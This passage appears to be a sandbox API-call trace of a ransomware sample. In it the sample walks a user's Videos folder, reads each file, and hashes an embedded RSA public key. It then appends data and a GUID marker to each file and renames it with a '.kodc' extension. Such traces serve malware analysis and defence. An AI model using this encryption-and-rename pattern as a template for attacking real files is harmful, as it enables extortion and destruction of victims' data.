lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.429] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.430] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x374035c0, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x4da46560, ftLastAccessTime.dwHighDateTime=0x1d5b91c, ftLastWriteTime.dwLowDateTime=0x4da46560, ftLastWriteTime.dwHighDateTime=0x1d5b91c, nFileSizeHigh=0x0, nFileSizeLow=0xa2a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RT_vF1gOxTZ.avi", cAlternateFileName="RT_VF1~1.AVI")) returned 1 [0100.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.430] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RT_vF1gOxTZ.avi") returned=".avi" [0100.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RT_vF1gOxTZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rt_vf1goxtz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.431] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=41636) returned 1 [0100.431] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.434] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa27e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.434] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.435] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.435] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xa2a4, lpOverlapped=0x0) returned 1 [0100.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.436] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.437] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.437] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.437] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.437] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.437] GetLastError () returned 0x0 [0100.437] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.437] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.437] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.437] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.437] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa2a0) returned 0x9ba6d90 [0100.437] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c6a0 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c6e8 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.438] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7cf8 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ce0 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.440] GetCurrentThreadId () returned 0x42c [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6c98 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.440] GetCurrentThreadId () returned 0x42c [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cf8 [0100.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.442] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa2a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.442] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.442] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.442] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.443] CloseHandle (hObject=0x5cc) returned 1 [0100.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.444] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RT_vF1gOxTZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rt_vf1goxtz.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RT_vF1gOxTZ.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rt_vf1goxtz.avi.kodc")) returned 1 [0100.446] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc104dc80, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x2ddaea00, ftLastAccessTime.dwHighDateTime=0x1d5c0b6, ftLastWriteTime.dwLowDateTime=0x2ddaea00, ftLastWriteTime.dwHighDateTime=0x1d5c0b6, nFileSizeHigh=0x0, nFileSizeLow=0x93a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S7HFtHlscpsrLt.mp4", cAlternateFileName="S7HFTH~1.MP4")) returned 1 [0100.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.446] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S7HFtHlscpsrLt.mp4") returned=".mp4" [0100.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S7HFtHlscpsrLt.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s7hfthlscpsrlt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.446] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=37795) returned 1 [0100.446] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.450] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x937d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.450] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.451] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x93a3, lpOverlapped=0x0) returned 1 [0100.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.452] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.453] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.453] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.453] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.453] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.453] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.453] GetLastError () returned 0x0 [0100.453] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.453] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.454] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.454] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.454] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x93a0) returned 0x9ba8d90 [0100.454] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c6e8 [0100.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.455] RtlAllocateHeap 